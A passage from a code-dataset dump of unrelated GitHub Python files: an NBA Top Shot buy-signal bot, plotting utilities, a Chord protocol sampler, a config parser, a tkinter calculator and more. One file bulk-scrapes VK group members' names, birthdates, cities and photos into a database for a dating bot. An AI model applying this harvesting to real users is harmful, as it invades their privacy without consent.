设置价格过滤\n margin = 0.15 # 接受floor价贵20%的特殊编号\n discount = 0.15 # 比floor价低20%的无视编号直接秒\n\n moment_listings_new = await get_moment_listings(set_id, play_id)\n target_infos = get_target_number(\n moment_listings_new, target_price=floor_price * (1 + margin))\n if len(target_infos) != 0:\n for target_info in target_infos: # 测试时加上[:1]\n number, target_price, market_price = target_info[0], target_info[1], target_info[2]\n\n if market_price > target_price * (1-(margin+discount)):\n if number not in sn_targets: # 如果目标编号不是特殊编号\n logger.debug(\n f\"其他编号:{number},目标价{target_price:.0f}, 现价{market_price:.0f}, 跳过\")\n continue\n signal = '0'+' '+set_id+' '+play_id+' ' + number\n url = f\"www.nbatopshot.com/listings/p2p/{set_id}+{play_id}?serialNumber={number}\"\n subprocess.run(\"pbcopy\", universal_newlines=True,\n input=url) # 复制到剪切板\n logger.info(\n f\"{url},目标价{target_price:.0f}, 现价{market_price:.0f}, 进入购买\")\n if redis_client.get(signal) is None:\n logger.info(f\"send: {signal}\")\n socket.send_string(signal)\n redis_client.set(signal, 1)\n else:\n logger.info(f'{signal} has sent, skip')\n else:\n logger.debug(\"没有获取到目标价位的moment\")\n\n\nasync def main():\n setup_logging_pre()\n redis_client = redis.Redis(host='localhost', port=6379, db=0)\n context = zmq.Context()\n socket = context.socket(zmq.PUB)\n socket.bind('tcp://*:6666')\n target_infos = await load_targets_config('./csv/35000.csv') # 需要盯的名单设置在此处\n temp_moments = []\n while True:\n try:\n # 循环获取最近上新 和缓存对比\n # TODO default换成默认查询,否则太慢抢不到\n new_moments = await get_new_list_default()\n moments_will_search = []\n\n if len(temp_moments) == 0:\n moments_will_search = new_moments\n else:\n old_ids = list(map(lambda m: m['id'], temp_moments))\n new_ids = list(map(lambda m: m['id'], new_moments))\n last = old_ids[-1]\n if last in new_ids:\n moments_will_search = new_moments[new_ids.index(last)+1:]\n else:\n moments_will_search = new_moments\n\n if len(moments_will_search) == 0:\n logger.debug(\"没有新上架的瞬间\")\n else:\n search_play_ids = list(\n map(lambda i: i['play']['id'], moments_will_search))\n logger.debug(f\"过滤查询的moment数量为: {len(moments_will_search)}\")\n temp_moments = new_moments\n filter_target_infos = list(\n filter(lambda s: s[1] in search_play_ids, target_infos))\n if len(filter_target_infos) != 0:\n logger.info(\n f\"过滤查询在表格中的moment数量为: {len(filter_target_infos)}\")\n for buy_number_list in await asyncio.gather(*[process(target_info[0], target_info[1], target_info[2], target_info[3], socket, redis_client) for target_info in filter_target_infos]):\n logger.debug(f\"Buy list is {buy_number_list}\")\n else:\n logger.debug(\"最新上架没有表格中的\")\n except Exception as e:\n logger.warning(f\"send_buy_signal错误:{e}\")\n finally:\n time.sleep(random.uniform(5, 7))\n\nasyncio.run(main())\n","repo_name":"script-money/ts-helper","sub_path":"send_buy_signal.py","file_name":"send_buy_signal.py","file_ext":"py","file_size_in_byte":4995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"31477253420","text":"import unittest\nfrom taskbay.app.base import TaskBay\n\n\nclass TestTaskBayApp(unittest.TestCase):\n\n def test_app_config(self):\n \"\"\"hello world\"\"\"\n app = TaskBay(config_source='tests.unit.app.taskbay_config')\n self.assertEqual(app.task_cls, 'taskbay.task.base:_Task')\n\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"nanfang/taskbay","sub_path":"tests/unit/app/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28788082026","text":"import vkapi\nimport os\nimport vk\nfrom mongoengine import *\nfrom pymongo import MongoClient\nfrom settings import *\nfrom datetime import date\nimport math\n\nconnect(\"chat\", host=\"mongodb://127.0.0.1\")\n\nclass User(Document):\n user_id = IntField(required=True, unique=True)\n first_name = StringField(required=True)\n last_name = StringField(required=True)\n gender = IntField()\n stage = IntField()\n bdate = StringField()\n age = IntField()\n photo_max_orig = StringField()\n city_id = IntField()\n city_name = StringField()\n country_id = IntField()\n country_name = StringField()\n choice_gender = IntField()\n choice_age = IntField()\n photo_id = StringField()\n\nsession = vk.Session()\napi = vk.API(session, v=5.63, lang=\"ru\")\ndef calculate_age(day, month, year):\n today = date.today()\n return today.year - year - ((today.month, today.day) < (month, day))\n\ngroup_id = main_group_id\ndef getMembersBulk(group_id):\n first_check = api.groups.getMembers(group_id = group_id, count=1)\n maximum = first_check[\"count\"]\n amount = 500\n amou = math.ceil(maximum/amount)\n for c in range(0, amou):\n users = api.groups.getMembers(group_id = group_id, count=amount, offset = c*amount, \n fields = \"sex,bdate,city,country,photo_max_orig,photo_id,has_photo\")\n #print(users)\n for i in users[\"items\"]:\n if not i.get(\"deactivated\"):\n if i.get(\"has_photo\") == 1:\n print(i)\n user = User(user_id=i[\"id\"], first_name=i[\"first_name\"], last_name=i[\"last_name\"],\n gender=i.get(\"sex\"), bdate=i.get(\"bdate\"), photo_max_orig=i.get(\"photo_max_orig\"), city_id=i.get(\"city\", {}).get(\"id\"),\n city_name=i.get(\"city\", {}).get(\"title\"), country_id=i.get(\"country\", {}).get(\"id\"),\n country_name=i.get(\"country\", {}).get(\"title\"), photo_id = i.get(\"photo_id\"),stage=0)\n if user[\"bdate\"]:\n bdate = user[\"bdate\"]\n bdate = bdate.split(\".\")\n if len(bdate) == 3:\n # we have age\n day = int(bdate[0])\n month = int(bdate[1])\n year = int(bdate[2])\n age = calculate_age(day, month, year)\n \n user.age = age\n try:\n user.save()\n print(\"added {}\".format(i[\"id\"]))\n except Exception:\n pass\n\n\n\n\n\ngetMembersBulk(group_id)\n\n\n#user = api.users.get(user_ids=data[\"user_id\"], fields='sex,bdate,city,country,photo_max_orig')[0]","repo_name":"Ax3Effect/datingbot","sub_path":"getGroupMembers.py","file_name":"getGroupMembers.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"20802803577","text":"import csv\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nimport numpy as np\nimport math\nimport os\nimport scipy.signal\nimport sys\nimport getopt\nimport pickle\nfrom constants import *\nimport imageio\n\ndef plotHeatmaps(frames, out_name, plot_range = None):\n os.makedirs(out_name, exist_ok=True)\n if plot_range is None:\n plot_range = len(frames)\n out_drawing = frames[:,:,:]\n max_val = np.amax(frames[:,:,:])\n out_drawing[np.where(frames == -10000)] = 0;\n max_val = np.nanmax(frames)\n for i in range(plot_range):\n plt.imshow(out_drawing[i], vmax=max_val, vmin = 0)\n plt.colorbar()\n plt.savefig(out_name +'/' + str(i).zfill(4) + '.png', bbox_inches='tight')\n plt.close()\n\ndef plotGif(frames, out_folder, out_name, title = None, highlights = None, polygons = [], plot_range = None, fps = 10, frequency=1):\n os.makedirs(out_folder, exist_ok=True)\n if plot_range is None:\n plot_range = len(frames)\n out_drawing = np.copy(frames)\n max_val = np.amax(frames[:,:,:])\n out_drawing[np.where(frames == -10000)] = 0\n max_val = np.nanmax(frames)\n images = []\n filenames = []\n for i in range(0,plot_range,frequency):\n fig, ax = plt.subplots()\n plt.axis('off')\n im = ax.imshow(out_drawing[i], vmax=max_val, vmin = 0)\n if highlights is not None: \n for hl in highlights[i]:\n circle = plt.Circle((hl['col'], hl['row']), 1, color=hl['color'])\n #ax.text(hl['col'],hl['row'],'.', ha=\"center\", va=\"center\", color=hl['color'], fontsize=64)\n ax.add_artist(circle)\n for poly in polygons:\n cur_poly = plt.Polygon(poly, fill=False, edgecolor='r')\n ax.add_patch(cur_poly)\n cbar = fig.colorbar(im)\n cbar.set_label(\"Pressure (psi)\")\n if title is not None:\n plt.title(title)\n plt.tight_layout()\n canvas = FigureCanvas(fig)\n canvas.draw()\n width, height = fig.get_size_inches() * fig.get_dpi()\n image = np.fromstring(canvas.tostring_rgb(), dtype='uint8').reshape(int(height), int(width), 3)\n images.append(image)\n plt.close()\n imageio.mimsave(out_folder + '/' + out_name +'.gif', images, fps=10)\n\ndef plotGestureHistos(touches_data, out_dir):\n os.makedirs(out_dir, exist_ok=True)\n gesture_counts = {}\n for touch in touches_data:\n if touch[\"emotion\"] not in gesture_counts.keys():\n gesture_counts[touch[\"emotion\"]] = {}\n if touch[\"gesture\"] not in gesture_counts[touch[\"emotion\"]].keys():\n gesture_counts[touch[\"emotion\"]][touch[\"gesture\"]] = 0\n gesture_counts[touch[\"emotion\"]][touch[\"gesture\"]] += 1\n for emotion in gesture_counts.keys():\n cur_dict = gesture_counts[emotion]\n plt.bar(range(len(cur_dict)), cur_dict.values(), align='center')\n plt.xticks(range(len(cur_dict)), cur_dict.keys())\n plt.title(emotion)\n plt.savefig(out_dir +'/' + emotion + '.png')\n plt.close()\n\ndef multiPlotHeatmaps(frames_array, out_name):\n num_plots = len(frames_array)\n os.makedirs(out_name, exist_ok=True)\n plt.figure(1)\n for i in range(len(frames_array[0])):\n for j in range(num_plots):\n plt.subplot(num_plots, 1, j+1)\n frames = frames_array[j]\n out_drawing = frames[:,:,:]\n max_val = np.amax(frames[:,:,:])\n out_drawing[np.where(frames == -10000)] = 0;\n max_val = np.nanmax(frames)\n plt.imshow(out_drawing[i], vmax=max_val)\n plt.colorbar()\n plt.savefig(out_name +'/' + str(i).zfill(4) + '.png', bbox_inches='tight')\n plt.close()\n","repo_name":"charm-lab/social_multiobject_tracking","sub_path":"general_plotting.py","file_name":"general_plotting.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14099525327","text":"class Solution(object):\n def searchMatrix(self, matrix, target):\n \"\"\"\n :type matrix: List[List[int]]\n :type target: int\n :rtype: bool\n \"\"\"\n r = len(matrix)\n if r == 0:\n return False\n c= len(matrix[0])\n \n start = 0\n end = r*c-1\n #We flatten the matrix\n #[1,2,5,7|10,11,16,20|23,30,34,60]\n # Find the middle. To find column middle // #colums\n #To fidn row middle % columns\n while start <= end:\n pivot = (start + end) //2\n curr_element = matrix[pivot//c][pivot%c]\n if target == curr_element:\n return True\n elif target < curr_element:\n end = pivot -1\n elif target > curr_element:\n start = pivot + 1\n return False\n \n ","repo_name":"saviaga/CodingProblems","sub_path":"74-search-a-2d-matrix/74-search-a-2d-matrix.py","file_name":"74-search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20758154954","text":"import numpy as np\nfrom collections import defaultdict\nfrom scipy.special import comb\nimport time\nimport pandas as pd\nfrom itertools import product, permutations\n\nrng = np.random.default_rng(0)\n\ndef join_prec(x, y):\n\tif not ((not a[x])):\n\t\treturn False\n\tif not ((a[y])):\n\t\treturn False\n\tif not ((not btw[x, org, y])):\n\t\treturn False\n\treturn True\n\ndef join(x, y):\n\ta[x] = True\n\tfor Y in range(node_num):\n\t\ts1[x, Y] = y == Y\n\tin_s1[x] = True\n\tfor Y in range(node_num):\n\t\ts2[x, Y] = False\n\tin_s2[x] = False\n\tfor Y in range(node_num):\n\t\tp[x, Y] = False\n\ndef stabilize_prec(x, y, z):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((a[y])):\n\t\treturn False\n\tif not ((p[y, z])):\n\t\treturn False\n\tif not ((btw[x, z, y])):\n\t\treturn False\n\treturn True\n\ndef stabilize(x, y, z):\n\tfor Z in range(node_num):\n\t\ts1[x, Z] = Z == z\n\tin_s1[x] = True\n\tfor Y in range(node_num):\n\t\ts2[x, Y] = Y == y\n\tin_s2[x] = True\n\ndef notify_prec(x, y, z):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((a[y])):\n\t\treturn False\n\ttmp_var_1 = True\n\tfor X in range(node_num):\n\t\tif not (p[y, z] or not p[y, X]):\n\t\t\ttmp_var_1 = False\n\t\t\tbreak\n\tif not (tmp_var_1):\n\t\treturn False\n\tif not ((btw[z, x, y])):\n\t\treturn False\n\treturn True\n\ndef notify(x, y, z):\n\tfor X in range(node_num):\n\t\tp[y, X] = X == x\n\ndef inherit_prec(x, y, z):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((a[y])):\n\t\treturn False\n\tif not ((s1[y, z])):\n\t\treturn False\n\treturn True\n\ndef inherit(x, y, z):\n\tfor Z in range(node_num):\n\t\ts2[x, Z] = Z == z\n\tin_s2[x] = True\n\ndef remove_prec(x, y, z):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((not a[y])):\n\t\treturn False\n\tif not ((s2[x, z])):\n\t\treturn False\n\treturn True\n\ndef remove(x, y, z):\n\tfor Z in range(node_num):\n\t\ts1[x, Z] = Z == z\n\tin_s1[x] = True\n\tfor Y in range(node_num):\n\t\ts2[x, Y] = False\n\tin_s2[x] = False\n\ndef fail_prec(x):\n\tif not ((a[x])):\n\t\treturn False\n\tif not ((x != org)):\n\t\treturn False\n\ttmp_var_2 = True\n\tfor Y in range(node_num):\n\t\tif not (not ((s1[Y, x])) or (in_s2[Y])):\n\t\t\ttmp_var_2 = False\n\t\t\tbreak\n\tif not (tmp_var_2):\n\t\treturn False\n\ttmp_var_3 = True\n\tfor Z in range(node_num):\n\t\tfor Y in range(node_num):\n\t\t\tif not (not ((s1[Y, x] and s2[Y, Z])) or (a[Z])):\n\t\t\t\ttmp_var_3 = False\n\t\t\t\tbreak\n\tif not (tmp_var_3):\n\t\treturn False\n\ttmp_var_4 = True\n\tfor Y in range(node_num):\n\t\tfor X in range(node_num):\n\t\t\tif not (not ((s1[X, Y] and s2[X, x])) or ((Y != x and a[Y]))):\n\t\t\t\ttmp_var_4 = False\n\t\t\t\tbreak\n\tif not (tmp_var_4):\n\t\treturn False\n\treturn True\n\ndef fail(x):\n\ta[x] = False\n\tfor Y in range(node_num):\n\t\tp[x, Y] = False\n\tfor Y in range(node_num):\n\t\ts1[x, Y] = False\n\tin_s1[x] = False\n\tfor Y in range(node_num):\n\t\ts2[x, Y] = False\n\tin_s2[x] = False\n\ndef reach_org_prec(x, y, z):\n\tif not (((s1[x, y] and a[y] and reach[y]) or (s1[x, y] and not a[y] and s2[x, z] and a[z] and reach[z]))):\n\t\treturn False\n\treturn True\n\ndef reach_org(x, y, z):\n\treach[x] = True\n\ndef remove_org_prec(x, y, z):\n\tif not ((x != org)):\n\t\treturn False\n\tif not ((s1[x, y])):\n\t\treturn False\n\tif not ((not a[y] or not reach[y])):\n\t\treturn False\n\ttmp_var_5 = True\n\tfor Z in range(node_num):\n\t\tif not (not (not a[y]) or ((not s2[x, Z] or s2[x, z]))):\n\t\t\ttmp_var_5 = False\n\t\t\tbreak\n\tif not (tmp_var_5):\n\t\treturn False\n\tif not ((not ((not a[y] and s2[x, z])) or ((not a[z] or not reach[z])))):\n\t\treturn False\n\treturn True\n\ndef remove_org(x, y, z):\n\treach[x] = False\n\nfunc_from_name = {'join': join, 'join_prec': join_prec, 'stabilize': stabilize, 'stabilize_prec': stabilize_prec, 'notify': notify, 'notify_prec': notify_prec, 'inherit': inherit, 'inherit_prec': inherit_prec, 'remove': remove, 'remove_prec': remove_prec, 'fail': fail, 'fail_prec': fail_prec, 'reach_org': reach_org, 'reach_org_prec': reach_org_prec, 'remove_org': remove_org, 'remove_org_prec': remove_org_prec}\n\ndef instance_generator():\n\tnode_num = rng.integers(3, 7)\n\treturn node_num\n\ndef sample(max_iter=50):\n\tglobal node_num, a, s1, in_s1, s2, in_s2, p, reach, error, org, other, btw\n\tdf_data = set()\n\tstopping_criteria = False\n\tsimulation_round = 0\n\tdf_size_history = [0]\n\twhile stopping_criteria is False:\n\t\t# protocol initialization\n\t\tnode_num = instance_generator()\n\t\ta = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\ts1 = rng.integers(0, 2, size=(node_num, node_num), dtype=bool)\n\t\tin_s1 = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\ts2 = rng.integers(0, 2, size=(node_num, node_num), dtype=bool)\n\t\tin_s2 = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\tp = rng.integers(0, 2, size=(node_num, node_num), dtype=bool)\n\t\treach = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\terror = rng.integers(0, 2, size=(node_num), dtype=bool)\n\t\torg = rng.integers(0, node_num)\n\t\tother = rng.integers(0, node_num)\n\t\t# build ring topology\n\t\tbtw = np.zeros((node_num, node_num, node_num), dtype=bool)\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\tif x != y and x != z and y != z:\n\t\t\t\t\t\tbtw[x, y, z] = (x < y < z) | (z < x < y) | (y < z < x)\n\t\tother, org = rng.choice(node_num, 2, replace=False)\n\t\t\n\t\tfor X in range(node_num):\n\t\t\ta[X] = X == org or X == other\n\t\tfor X in range(node_num):\n\t\t\tfor Y in range(node_num):\n\t\t\t\ts1[X, Y] = (X == org and Y == other) or (X == other and Y == org)\n\t\tfor X in range(node_num):\n\t\t\tin_s1[X] = X == org or X == other\n\t\tfor X in range(node_num):\n\t\t\tfor Y in range(node_num):\n\t\t\t\ts2[X, Y] = False\n\t\tfor X in range(node_num):\n\t\t\tin_s2[X] = False\n\t\tfor X in range(node_num):\n\t\t\tfor Y in range(node_num):\n\t\t\t\tp[X, Y] = (X == org and Y == other) or (X == other and Y == org)\n\t\tfor X in range(node_num):\n\t\t\treach[X] = X == org\n\t\tfor X in range(node_num):\n\t\t\terror[X] = False\n\n\t\taction_pool = ['join', 'stabilize', 'notify', 'inherit', 'remove', 'fail', 'reach_org', 'remove_org']\n\t\targument_pool = dict()\n\t\targument_pool['join'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\targument_pool['join'].append((x, y))\n\t\targument_pool['stabilize'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['stabilize'].append((x, y, z))\n\t\targument_pool['notify'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['notify'].append((x, y, z))\n\t\targument_pool['inherit'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['inherit'].append((x, y, z))\n\t\targument_pool['remove'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['remove'].append((x, y, z))\n\t\targument_pool['fail'] = []\n\t\tfor x in range(node_num):\n\t\t\targument_pool['fail'].append((x,))\n\t\targument_pool['reach_org'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['reach_org'].append((x, y, z))\n\t\targument_pool['remove_org'] = []\n\t\tfor x in range(node_num):\n\t\t\tfor y in range(node_num):\n\t\t\t\tfor z in range(node_num):\n\t\t\t\t\targument_pool['remove_org'].append((x, y, z))\n\n\t\tfor curr_iter in range(max_iter):\n\t\t\trng.shuffle(action_pool)\n\t\t\taction_selected, args_selected = None, None\n\t\t\tfor action in action_pool:\n\t\t\t\trng.shuffle(argument_pool[action])\n\t\t\t\targument_candidates = argument_pool[action]\n\t\t\t\tfor args_candidate in argument_candidates:\n\t\t\t\t\tif func_from_name[action + '_prec'](*args_candidate):\n\t\t\t\t\t\taction_selected, args_selected = action, args_candidate\n\t\t\t\t\t\tbreak\n\t\t\t\tif action_selected is not None:\n\t\t\t\t\tbreak\n\t\t\tif action_selected is None:\n\t\t\t\t# action pool exhausted, start a new simulation\n\t\t\t\tbreak\n\t\t\tfunc_from_name[action_selected](*args_selected)\n\n\t\t\t# generate subsamples from the current state (sample)\n\t\t\tfor k in range(3):\n\t\t\t\tnode_indices = rng.choice(list(range(node_num)), 3, replace=False)\n\t\t\t\tnode_indices = sorted(node_indices)\n\t\t\t\tfor N1, N2, N3, in permutations(node_indices):\n\t\t\t\t\tdf_data.add((a[N1], a[N2], a[N3], s1[N1,N1], s1[N1,N2], s1[N1,N3], s1[N2,N1], s1[N2,N2], s1[N2,N3], s1[N3,N1], s1[N3,N2], s1[N3,N3], in_s1[N1], in_s1[N2], in_s1[N3], s2[N1,N1], s2[N1,N2], s2[N1,N3], s2[N2,N1], s2[N2,N2], s2[N2,N3], s2[N3,N1], s2[N3,N2], s2[N3,N3], in_s2[N1], in_s2[N2], in_s2[N3], reach[N1], reach[N2], reach[N3], btw[N1,N2,N3], org==N1, org==N2, org==N3, other==N1, other==N2, other==N3))\n\t\tsimulation_round += 1\n\t\tdf_size_history.append(len(df_data))\n\t\tstopping_criteria = simulation_round > 1000 or (simulation_round > 20 and df_size_history[-1] == df_size_history[-21])\n\treturn list(df_data)\n\nif __name__ == '__main__':\n\tstart_time = time.time()\n\tdf_data = sample()\n\tdf = pd.DataFrame(df_data, columns=['a(N1)', 'a(N2)', 'a(N3)', 's1(N1,N1)', 's1(N1,N2)', 's1(N1,N3)', 's1(N2,N1)', 's1(N2,N2)', 's1(N2,N3)', 's1(N3,N1)', 's1(N3,N2)', 's1(N3,N3)', 'in_s1(N1)', 'in_s1(N2)', 'in_s1(N3)', 's2(N1,N1)', 's2(N1,N2)', 's2(N1,N3)', 's2(N2,N1)', 's2(N2,N2)', 's2(N2,N3)', 's2(N3,N1)', 's2(N3,N2)', 's2(N3,N3)', 'in_s2(N1)', 'in_s2(N2)', 'in_s2(N3)', 'reach(N1)', 'reach(N2)', 'reach(N3)', 'ring.btw(N1,N2,N3)', 'org=N1', 'org=N2', 'org=N3', 'other=N1', 'other=N2', 'other=N3'])\n\tdf = df.drop_duplicates().astype(int)\n\tend_time = time.time()\n\tdf.to_csv('../traces/chord.csv', index=False)\n\tprint('Simulation finished. Trace written to traces/chord.csv')\n","repo_name":"VeriGu/DistAI","sub_path":"auto_samplers/chord.py","file_name":"chord.py","file_ext":"py","file_size_in_byte":9303,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"27"} +{"seq_id":"6378837970","text":"from .API import RouteMethodView\nfrom .CRUD import CRUD\nfrom .db import db\n\n\nclass Characteristic(db.Model):\n __tablename__ = 'characteristic'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, nullable=False)\n icon = db.Column(db.String(255))\n\n\nclass CharacteristicView(CRUD, RouteMethodView):\n route = Characteristic.__tablename__\n\n def __init__(self):\n super().__init__(Characteristic)\n","repo_name":"EthanITA/my-maitre","sub_path":"be/routes/Characteristic.py","file_name":"Characteristic.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"525954794","text":"\"\"\"\nNSSwitchConf - file ``/etc/nsswitch.conf``\n==========================================\n\n\"\"\"\n\nfrom insights import LegacyItemAccess, Parser, parser\nfrom insights.parsers import get_active_lines\nfrom insights.specs import Specs\n\n\n@parser(Specs.nsswitch_conf)\nclass NSSwitchConf(Parser, LegacyItemAccess):\n \"\"\"\n Read the contents of the ``/etc/nsswitch.conf`` file.\n\n Each non-commented line is split into the service and its sources. The\n sources (e.g. 'files sss') are stored as is, as a string.\n\n nsswitch.conf is case insensitive. This means that both the service and\n its sources are converted to lower case and searches should be done\n using lower case text.\n\n Attributes:\n data (dict): The service dictionary\n errors (list): Non-blank lines which don't contain a ':'\n sources (set): An unordered set of the sources seen in this file\n\n Sample content::\n\n # Example:\n #passwd: db files nisplus nis\n #shadow: db files nisplus nis\n #group: db files nisplus nis\n\n passwd: files sss\n shadow: files sss\n group: files sss\n #initgroups: files\n\n #hosts: db files nisplus nis dns\n hosts: files dns myhostname\n\n Examples:\n\n >>> nss = shared[NSSwitchConf]\n >>> 'passwd' in nss\n True\n >>> 'initgroups' in nss\n False\n >>> nss['passwd']\n 'files nss'\n >>> 'files' in nss['hosts']\n True\n >>> nss.errors\n []\n >>> nss.sources\n set(['files', 'dns', 'sss', 'myhostname'])\n\n \"\"\"\n def parse_content(self, content):\n self.errors = []\n self.data = {}\n self.sources = set()\n for line in get_active_lines(content):\n if ':' not in line:\n self.errors.append(line)\n else:\n service, sources = [s.lower().strip() for s in line.split(':', 1)]\n self.data[service] = sources\n self.sources.update(set(sources.split(None)))\n","repo_name":"RedHatInsights/insights-core","sub_path":"insights/parsers/nsswitch_conf.py","file_name":"nsswitch_conf.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"27"} +{"seq_id":"24956927640","text":"\"\"\"\n计算器项目\n布局使用Place,利用容器来装相应的组件,具有菜单项顶级菜单\n相关函数\n数字的操作函数\n字符的操作函数\n相关运算的操作函数\n\"\"\"\nfrom tkinter import *\nfrom tkinter import messagebox\nimport operator\n\n\nclass Calculator(Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.master.title(\"小破孩蘑菇头计算器\")\n self.master.geometry(\"300x315+500+200\")\n self.master.resizable(0, 0) # 边框不允许调整\n self.rst1 = StringVar() # 计算器过程显示对象\n self.rst1.set(\"0\")\n self.rst2 = StringVar() # 计算器结果显示框对象\n self.rst2.set(\"\")\n self.lists = []\n self.menu_tools()\n self.master.bind(\"\", self.show_info)\n self.create_widget()\n self.mainloop()\n\n def create_widget(self):\n # 先创建计算过程和结算结果的容器\n label_frame = Frame(self.master, width=300, height=60, bg=\"pink\")\n label_frame.place(x=0, y=0)\n label02 = Label(label_frame, textvariable=self.rst2, width=300, height=30, bg=\"orange\",font=(\"黑体\",15,\"bold\"), justify=LEFT, anchor=\"e\")\n label02.place(relx=0,rely=0,width=300,height=30)\n label01 = Label(label_frame,textvariable=self.rst1, width=300, height=30, bg=\"pink\", font=(\"黑体\",20,\"bold\"), justify=LEFT, anchor=\"e\")\n label01.place(relx=0, rely=0.5, width=300, height=30)\n button_frame = Frame(self.master, width=300, height=340, bg=\"#0ceecc\")\n button_frame.place(x=0, y=60)\n btn_AC = Button(button_frame, text=\"AC\",command=self.clear)\n btn_AC.place(x=10,y=10,width=60, height=40)\n btn_Sqrt = Button(button_frame, text=\"Sqrt\", command=self.sqrt)\n btn_Sqrt.place(x=85, y=10, width=60, height=40)\n btn_Power = Button(button_frame, text=\"Power\", command=self.power)\n btn_Power.place(x=155, y=10, width=60, height=40)\n btn_back = Button(button_frame, text=\"←\",command=self.rollback)\n btn_back.place(x=225,y=10,width=60,height=40)\n num_btn = Button(button_frame, text=\"7\", command=lambda:self.press_num(\"7\"))\n num_btn.place(x=10, y=60, width=60, height=40)\n num_btn = Button(button_frame, text=\"8\", command=lambda:self.press_num(\"8\"))\n num_btn.place(x=85, y=60, width=60, height=40)\n num_btn = Button(button_frame, text=\"9\", command=lambda:self.press_num(\"9\"))\n num_btn.place(x=155, y=60, width=60, height=40)\n num_btn = Button(button_frame, text=\"÷\", command=lambda:self.operation(\"/\"))\n num_btn.place(x=225, y=60, width=60, height=40)\n num_btn = Button(button_frame, text=\"4\", command=lambda:self.press_num(\"4\"))\n num_btn.place(x=10, y=110, width=60, height=40)\n num_btn = Button(button_frame, text=\"5\", command=lambda:self.press_num(\"5\"))\n num_btn.place(x=85, y=110, width=60, height=40)\n num_btn = Button(button_frame, text=\"6\", command=lambda:self.press_num(\"6\"))\n num_btn.place(x=155, y=110, width=60, height=40)\n num_btn = Button(button_frame, text=\"x\", command=lambda:self.operation(\"*\"))\n num_btn.place(x=225, y=110, width=60, height=40)\n num_btn = Button(button_frame, text=\"1\", command=lambda:self.press_num(\"1\"))\n num_btn.place(x=10, y=160, width=60, height=40)\n num_btn = Button(button_frame, text=\"2\", command=lambda:self.press_num(\"2\"))\n num_btn.place(x=85, y=160, width=60, height=40)\n num_btn = Button(button_frame, text=\"3\", command=lambda:self.press_num(\"3\"))\n num_btn.place(x=155, y=160, width=60, height=40)\n num_btn = Button(button_frame, text=\"-\", command=lambda:self.operation(\"-\"))\n num_btn.place(x=225, y=160, width=60, height=40)\n num_btn = Button(button_frame, text=\"0\", command=lambda:self.press_num(\"0\"))\n num_btn.place(x=10, y=210, width=60, height=40)\n num_btn = Button(button_frame, text=\".\", command=lambda:self.press_num(\".\"))\n num_btn.place(x=85, y=210, width=60, height=40)\n num_btn = Button(button_frame, text=\"=\", command=lambda:self.cal_result(\"=\"))\n num_btn.place(x=155, y=210, width=60, height=40)\n num_btn = Button(button_frame, text=\"+\", command=lambda:self.operation(\"+\"))\n num_btn.place(x=225, y=210, width=60, height=40)\n\n def clear(self):\n self.lists.clear()\n self.rst1.set(\"0\")\n self.rst2.set(\"\")\n\n def sqrt(self):\n if len(self.lists) != 0:\n if self.lists[-1] in [\"+\", \"-\", \"*\", \"/\"]:\n del self.lists[-1]\n else:\n com_str = \"\".join(self.lists)\n end_rst = eval(com_str)\n end_rst = end_rst ** 0.5\n self.rst1.set(\"√(\" + com_str + \")\")\n self.rst2.set(end_rst)\n self.lists.clear()\n self.lists.append(str(end_rst))\n\n def power(self):\n if len(self.lists) == 0:\n self.rst2.set(\"0的平方还是0\")\n self.rst1.set(\"0\")\n else:\n if self.lists[-1] in [\"+\", \"-\", \"*\", \"/\"]:\n del self.lists[-1]\n else:\n new_str = \"\".join(self.lists)\n end_num = eval(new_str)\n end_num = end_num * end_num\n self.rst2.set(end_num)\n self.rst1.set(\"(\" + new_str + 